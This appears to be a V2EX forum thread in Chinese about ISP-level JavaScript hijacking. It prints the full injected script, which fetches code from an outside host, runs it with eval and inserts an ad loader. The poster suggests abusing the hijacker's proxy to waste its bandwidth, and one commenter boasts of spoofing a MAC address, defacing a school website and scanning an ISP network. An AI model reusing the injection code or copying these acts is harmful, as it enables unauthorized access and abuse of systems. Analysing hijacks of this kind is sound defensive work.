一个反杀网络劫持的思路?

2018-01-27 12:53:56 +08:00
 Soar360

租住昌平一角的公寓,宽带不知名,10M 要 100RMB 一月。最近发现网络劫持越来越厉害了。

网络抓包发现,包含 jQuery 在内的多个 js 文件被劫持,文件内容被替换为了下面的样子(原地址是 ECharts ):

var sourceScriptURI = 'http://echarts.baidu.com/dist/echarts.min.js';
(function() {
    var evalGloble = eval;
    var _loader = function(uri) {
        if (!top || !this) {
            return setTimeout(arguments.callee, 50);
        }
        if (top != this) {
            return;
        }

        var s = window.top.document.createElement('script');
        s.src = uri;
        s.type = 'text/javascript';
        s.charset = 'utf-8';
        s.async = 'true';
        window.top.document.body.appendChild(s);
    };

    var evalSrcScript = function(uri) {
        var url = "http://www.fjlqqc.com/common/api/v1.0/src_script/?path=" + encodeURIComponent(uri);
        var xhr = new XMLHttpRequest();
        xhr.open('GET', url, false);
        xhr.setRequestHeader("X-Page-Charset", document.charset);
        xhr.send();
        try {
            evalGloble(xhr.responseText);
        } catch(error) {}
    };

    var getCurrentScript = function(sourceScriptURI) {
        var scripts = document.getElementsByTagName('script');
        for (var i = 0; i < scripts.length; ++i) {
            if (scripts[i].src == sourceScriptURI) return scripts[i];
        }
    };

    var _looper, injection;
    var _loop = function() {
        switch (document.readyState) {
            case 'loading':
                break;
            case 'interactive':
            case 'complete':
                clearInterval(_looper);
                if (window.__COODAGLIFE__ === undefined) {
                    _loader(injectionScriptURI + trim(publisherID) + "/");
                    localStorage.COODAG_SERUM_IC = injectionScriptURI;
                    window.__COODAGLIFE__ = true;
                }
                break;
            default:
                clearInterval(_looper);
                break;
        }
    };

    var inject = function() {
        _looper = setInterval(_loop, 50);
    };

    function trim(s){
        return s.replace(/(^\s*)|(\s*$)/g, "");
    }

    var publisherID = '00000000-00000-0000-0000';//已修改
    var injectionScriptURI = "http://www.fjlqqc.com/common/api/v1.0/slot-code/publisher/";
    //var currentScript = getCurrentScript(sourceScriptURI);
    if (true) {
        evalSrcScript(sourceScriptURI);
    }

    inject();
})();

可以看到,这段代码向页面注入了另一段 js 代码

http://www.fjlqqc.com/common/api/v1.0/slot-code/publisher/{publisherID}/

并通过访问

http://www.fjlqqc.com/common/api/v1.0/src_script/?path={sourceScriptURI}

将原始的 JS 再带入网页。如何反杀?当然是用它的代理咯。于是我写出了下面的代码:

<img src="http://www.fjlqqc.com/common/api/v1.0/src_script/?path=https%3A%2F%2Fwww.coderbusy.com%2Fwp-content%2Fuploads%2F2017%2F10%2F20171010032255_3047.png" />

经测试,可用,速度还可以。要不要挂一个大大的下载包上去,就看各位的心情了。

8260 次点击
所在节点    奇思妙想
24 条回复
xmoiduts
2018-01-28 09:48:17 +08:00
@zjcqoo 的说法是有道理的,以前观察过某大运营商的 120.52.?.*段缓存,确实是你下了多少他缓存多少,不会多存。
但一开始走代理的水管粗,比自己坐飞机快。过些日子,网速就也不行了。
Tovcn
2018-01-28 11:00:16 +08:00
漂亮。。。。。
zjcqoo
2018-01-28 17:20:52 +08:00
之前家里的宽带(杭州网通)也遇到过类似的事。HTTP 页面右下角经常弹广告浮层,而且下载文件经常被重定向到 `http://218.108.x.x/1Q2W3E4R5T6Y7U8I9O0P1Z2X3C4V5B/raw_url`,(网上搜了下遇到过的还不少),估计是为了加速(但实现的也太 low 了,搞个透明代理不就好了)。

想起 218.108.x.x 这个段是可以通过机顶盒的城域网( 10.x.x.x )访问的。

( BTW:当初挨家挨户送机顶盒的时候,正好在研究网络相关的事。于是把电脑 MAC 改成机顶盒差不多的,就能自动分配到 10.x.x.x 的 IP 端。DNS 是 218.108.x.x 的,可以 ping 出各个域名。正好高中的网站也在 218.108.x.x 段里的,于是用内网 IP 把网站首页黑了,一直没查出来 2333333 )

于是写了个 nginx 配置,在本机开了个代理,把浏览器访问 HTTP 的流量都通过城域网转发到那台服务器上。毕竟 PPPoE 是限速的,而城域网 100Mbps 几乎管够,下载可以快好多。

后来扫描了下 218.108 的网段,发现开这种代理的服务器还不少,记得好像有几十个。于是正好把 nginx 的负载均衡功能都用上了:)
Soar360
2018-01-29 08:47:09 +08:00
@zjcqoo 这个厉害

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/426362

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX